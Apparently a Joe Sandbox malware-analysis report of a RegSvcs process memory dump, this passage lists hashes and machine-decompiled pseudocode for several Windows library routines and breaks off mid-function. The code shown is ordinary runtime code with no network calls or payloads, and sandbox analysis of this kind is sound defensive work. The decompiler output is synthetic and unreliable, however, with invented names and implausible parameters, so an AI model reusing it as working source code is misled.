Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: d82e993218254395ee1c528461720df2138d7b8171adf6e083411edf4b67239f
Instruction ID: 7aad141fe774792bdfa12f20a667ae09cf263aab81e1721389fdb942a5cbb71d
Opcode Fuzzy Hash: d82e993218254395ee1c528461720df2138d7b8171adf6e083411edf4b67239f
Instruction Fuzzy Hash: BB515771A09345CFCB21DF68C08492ABBE9FB89714F14496EE689D7355E730E940CB92

Uniqueness

Uniqueness Score: -1.00%

Function 018CB171 Relevance: 1.7, APIs: 1, Instructions: 166
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E018CB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x199f7a8);
				E0191D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0191D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0190D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0190F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											E0191DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0190B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0190B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0190E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0190A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x018cb171
0x018cb171
0x018cb171
0x018cb171
0x018cb171
0x018cb176
0x018cb17b
0x018cb180
0x018cb186
0x018cb18f
0x018cb198
0x018cb1a4
0x018cb1aa
0x01924802
0x01924802
0x01924805
0x0192480c
0x0192480e
0x018cb1d1
0x018cb1d3
0x018cb1de
0x018cb1de
0x01924817
0x0192481e
0x01924820
0x01924822
0x01924822
0x01924824
0x01924824
0x0192482a
0x00000000
0x00000000
0x01924835
0x0192483a
0x0192483d
0x0192483f
0x01924842
0x01924842
0x01924842
0x01924846
0x0192484c
0x0192484e
0x01924851
0x01924851
0x01924853
0x01924854
0x01924854
0x01924858
0x0192485a
0x0192485a
0x0192485d
0x0192485f
0x01924861
0x01924861
0x01924866
0x0192486b
0x0192486e
0x01924871
0x01924876
0x01924876
0x01924878
0x0192487b
0x01924884
0x01924884
0x00000000
0x0192487d
0x0192487d
0x01924882
0x01924889
0x01924889
0x0192488f
0x01924891
0x019248e0
0x019248e2
0x019248e4
0x019248e4
0x019248e7
0x019248e7
0x019248ed
0x019248f4
0x019248f6
0x01924951
0x01924951
0x01924953
0x01924953
0x01924956
0x01924956
0x01924958
0x01924959
0x01924959
0x0192495d
0x0192495d
0x0192495f
0x0192495f
0x01924965
0x01924969
0x019249ba
0x019249ba
0x019249c1
0x019249c5
0x019249cc
0x019249d4
0x019249d7
0x019249da
0x019249e4
0x019249e5
0x019249f3
0x01924a02
0x00000000
0x01924a02
0x01924972
0x01924974
0x00000000
0x00000000
0x01924976
0x01924979
0x01924982
0x01924983
0x01924984
0x0192498b
0x0192498d
0x01924991
0x01924993
0x01924999
0x0192499d
0x019249a2
0x019249a2
0x019249a2
0x01924999
0x019249ac
0x00000000
0x019249b3
0x019248f8
0x019248fe
0x00000000
0x00000000
0x00000000
0x019248fe
0x01924895
0x0192489c
0x019248ad
0x019248b2
0x019248b5
0x019248b7
0x019248ba
0x019248bc
0x019248c6
0x019248c6
0x019248cb
0x019248d1
0x019248d4
0x019248d8
0x019248d8
0x00000000
0x019248d8
0x019248be
0x019248c0
0x00000000
0x00000000
0x019248c2
0x00000000
0x00000000
0x00000000
0x019248c4
0x00000000
0x01924882
0x0192487b
0x01924904
0x01924906
0x00000000
0x00000000
0x01924908
0x0192490e
0x00000000
0x00000000
0x01924910
0x01924917
0x01924917
0x00000000
0x01924917
0x018cb1ba
0x019247f9
0x019247fc
0x00000000
0x00000000
0x00000000
0x019247fc
0x018cb1c0
0x018cb1c0
0x018cb1c3
0x018cb1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 019248AD

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: e0aa358de9e7c8c4928a8ae0ec618d513e5c090f98b996dabf566cabe28174bd
Instruction ID: 48d75750da390119d838175407a13d0caa8c071fba160b38ceda81092c1a479b
Opcode Fuzzy Hash: e0aa358de9e7c8c4928a8ae0ec618d513e5c090f98b996dabf566cabe28174bd
Instruction Fuzzy Hash: 9E51D375E102698FDB36CF68C845BBEBBB4BF44B10F1041ADD85DAB286D7704941CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01973D40 Relevance: 1.6, APIs: 1, Instructions: 98
timeCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E01973D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x19bd360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E018E2280(_t34, 0x19b8a6c);
				_t64 =  *0x19b5768; // 0x77575768
				if(_t64 != 0x19b5768) {
					while(1) {
						_t8 = _t64 + 8; // 0x77575770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E018DFFB0(_t53, _t64, 0x19b8a6c);
						 *0x19bb1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E018E2280(_t45, 0x19b8a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x19b5768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E018DFFB0(_t51, _t64, 0x19b8a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E0190B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

0x01973d40
0x01973d48
0x01973d52
0x01973d59
0x01973d5d
0x01973d61
0x01973d63
0x01973d67
0x01973d69
0x01973d72
0x01973d76
0x01973d7a
0x01973d7f
0x01973d8b
0x01973d91
0x01973d91
0x01973d91
0x01973d94
0x01973d96
0x01973d9d
0x01973da1
0x01973db0
0x01973dba
0x01973dbc
0x01973dbc
0x01973dc6
0x01973dcb
0x01973dcf
0x01973dd1
0x01973dd4
0x00000000
0x00000000
0x01973dd9
0x01973e0c
0x01973e0c
0x01973e0f
0x01973ddb
0x01973ddb
0x01973de0
0x00000000
0x01973de2
0x01973de2
0x01973de4
0x01973de8
0x01973deb
0x01973df1
0x00000000
0x01973df3
0x01973df3
0x01973df5
0x01973df8
0x01973dfa
0x00000000
0x01973dfa
0x01973df1
0x01973de0
0x01973e11
0x01973e11
0x00000000
0x01973dfe
0x01973e04
0x01973e06
0x00000000
0x01973e06
0x00000000
0x01973e04
0x01973d91
0x01973e15
0x01973e1a
0x01973e1f
0x01973e1f
0x01973e23
0x01973e29
0x00000000
0x00000000
0x01973e2e
0x00000000
0x01973e30
0x01973e30
0x01973e35
0x00000000
0x01973e37
0x01973e3e
0x01973e42
0x01973e48
0x01973e4e
0x00000000
0x01973e4e
0x01973e35
0x00000000
0x01973e2e
0x01973e5b
0x01973e5c
0x01973e5d
0x01973e68
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 01973DB0

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: f89dbd305ebacf91a6a060736e94583b068b46ee7dd5ab7b9ff020938c461c99
Instruction ID: bbb560a55877561e7df8cb0927bf0a619ca32d92191b53d5d2a91faac4c6500e
Opcode Fuzzy Hash: f89dbd305ebacf91a6a060736e94583b068b46ee7dd5ab7b9ff020938c461c99
Instruction Fuzzy Hash: AE3189B1609302DFC714DF28DA8095ABBE9FF89705F0549AEE4899B241D730EE04CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 01904A2C Relevance: 1.6, APIs: 1, Instructions: 92
timeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E01904A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x19bd360 ^ _t62;
				_v8 =  *0x19bd360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E018E2280(_t26, 0x19b8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E018DFFB0(_t41, _t51, 0x19b8608);
						L2:
						 *0x19bb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0190B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E018E2280(_t28, 0x19b8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E018DFFB0(_t42, _t53, 0x19b8608);
							if(_t53 != 0) {
								L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E018DFFB0(_t41, _t51, 0x19b8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x01904a2c
0x01904a34
0x01904a3c
0x01904a3e
0x01904a48
0x01904a4b
0x01904a4d
0x01904a51
0x01904a9c
0x00000000
0x00000000
0x01904aa3
0x01904aa8
0x01904aad
0x01904ab1
0x01904ade
0x01904ae3
0x01904a5a
0x01904a62
0x01904a6a
0x01904a6e
0x0193f203
0x01904a84
0x01904a88
0x01904a89
0x01904a8a
0x01904a95
0x01904a95
0x01904a79
0x01904a80
0x01904af2
0x01904af4
0x01904af9
0x01904aff
0x01904b01
0x01904b03
0x01904b08
0x0193f20a
0x0193f212
0x0193f216
0x0193f216
0x01904b08
0x01904b13
0x01904b1a
0x0193f229
0x0193f229
0x01904b1a
0x01904a82
0x00000000
0x01904a82
0x01904ab7
0x01904acd
0x01904acd
0x01904ad5
0x01904ada
0x00000000
0x01904ada
0x01904ac2
0x01904acb
0x00000000
0x00000000
0x00000000
0x01904acb
0x01904a53
0x01904a53
0x01904a58
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 01904A62

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 1e7be52290dd1a25baa38ccc0a8c5fc359ec4c3ba43cf1e550a259e7dcd69dcd
Instruction ID: 179fe72d670ee906e3847ce44ccfb93684ada701d2ab32aebef21a41e8349f70
Opcode Fuzzy Hash: 1e7be52290dd1a25baa38ccc0a8c5fc359ec4c3ba43cf1e550a259e7dcd69dcd
Instruction Fuzzy Hash: A9312432205711DFC7229F59CA84B2ABBE8FFC5B11F44096DEA5E4B281CB70D940CB86

Uniqueness

Uniqueness Score: -1.00%

Function 018E0050 Relevance: 1.6, APIs: 1, Instructions: 81
timeCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E018E0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x19bd360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E018F9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0190B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E01998A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E018F9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x19bb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x018e0055
0x018e005d
0x018e0062
0x018e006c
0x018e006f
0x018e0074
0x018e007a
0x018e007a
0x018e0080
0x018e0080
0x018e0087
0x018e008d
0x018e008f
0x018e0093
0x018e0095
0x018e009b
0x018e00f8
0x018e00fb
0x018e00fc
0x018e00ff
0x018e0108
0x018e0108
0x018e00a2
0x018e00a6
0x018e00b3
0x018e00bc
0x018e00c5
0x018e00ca
0x0192c01e
0x00000000
0x00000000
0x0192c02d
0x018e00d5
0x018e00d9
0x0192c03d
0x0192c046
0x0192c046
0x018e00df
0x018e00e2
0x018e00ea
0x018e00ef
0x018e00f2
0x018e00f6
0x018e0111
0x018e0117
0x018e0117
0x00000000
0x018e00f6
0x018e00d0
0x018e00d0
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 018E0111

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 2e2b623474f89cee96b17072beaddff21aa11f51d6edca6e4b86c68718fce4b6
Instruction ID: 65ff10984d6653149458085e02ee46dff47e6c5215eb60b1b09d51c8bd862792
Opcode Fuzzy Hash: 2e2b623474f89cee96b17072beaddff21aa11f51d6edca6e4b86c68718fce4b6
Instruction Fuzzy Hash: E7319C31601B048FD722CF28C844B5AB7E5FF8A714F14496DE59AC7690DB75A901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 018F2581 Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E018F2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35, char _a1530200459, char _a1546912139) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t244;
				signed int _t248;
				void* _t249;
				signed int _t250;
				signed int _t254;
				signed int _t256;
				intOrPtr _t258;
				signed int _t261;
				signed int _t268;
				signed int _t271;
				signed int _t279;
				signed int _t285;
				signed int _t287;
				void* _t289;
				signed int _t292;
				signed int _t293;
				unsigned int _t296;
				signed int _t300;
				void* _t301;
				signed int _t302;
				signed int _t306;
				intOrPtr _t318;
				signed int _t327;
				signed int _t329;
				signed int _t330;
				signed int _t334;
				signed int _t335;
				signed int _t339;
				signed int _t341;
				signed int _t343;
				void* _t344;
				void* _t346;

				_t341 = _t343;
				_t344 = _t343 - 0x4c;
				_v8 =  *0x19bd360 ^ _t341;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t334 = 0x19bb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t296 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t285 = 0x48;
				_t316 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t327 = 0;
				_v37 = _t316;
				if(_v48 <= 0) {
					L16:
					_t45 = _t285 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t335 = 0xc0000106;
						goto L32;
					} else {
						_t334 = L018E4620(_t296,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t285);
						_v52 = _t334;
						__eflags = _t334;
						if(_t334 == 0) {
							_t335 = 0xc0000017;
							goto L32;
						} else {
							 *(_t334 + 0x44) =  *(_t334 + 0x44) & 0x00000000;
							_t50 = _t334 + 0x48; // 0x48
							_t329 = _t50;
							_t316 = _v32;
							 *(_t334 + 0x3c) = _t285;
							_t287 = 0;
							 *((short*)(_t334 + 0x30)) = _v48;
							__eflags = _t316;
							if(_t316 != 0) {
								 *(_t334 + 0x18) = _t329;
								__eflags = _t316 - 0x19b8478;
								 *_t334 = ((0 | _t316 == 0x019b8478) - 0x00000001 & 0xfffffffb) + 7;
								E0190F3E0(_t329,  *((intOrPtr*)(_t316 + 4)),  *_t316 & 0x0000ffff);
								_t316 = _v32;
								_t344 = _t344 + 0xc;
								_t287 = 1;
								__eflags = _a8;
								_t329 = _t329 + (( *_t316 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t279 = E019539F2(_t329);
									_t316 = _v32;
									_t329 = _t279;
								}
							}
							_t300 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t335 = _v68;
								__eflags = 0;
								 *((short*)(_t329 - 2)) = 0;
								goto L32;
							} else {
								_t285 = _t334 + _t287 * 4;
								_v56 = _t285;
								do {
									__eflags = _t316;
									if(_t316 != 0) {
										_t244 =  *(_v60 + _t300 * 4);
										__eflags = _t244;
										if(_t244 == 0) {
											goto L30;
										} else {
											__eflags = _t244 == 5;
											if(_t244 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t285 =  *(_v60 + _t300 * 4);
										 *(_t285 + 0x18) = _t329;
										_t248 =  *(_v60 + _t300 * 4);
										__eflags = _t248 - 8;
										if(_t248 > 8) {
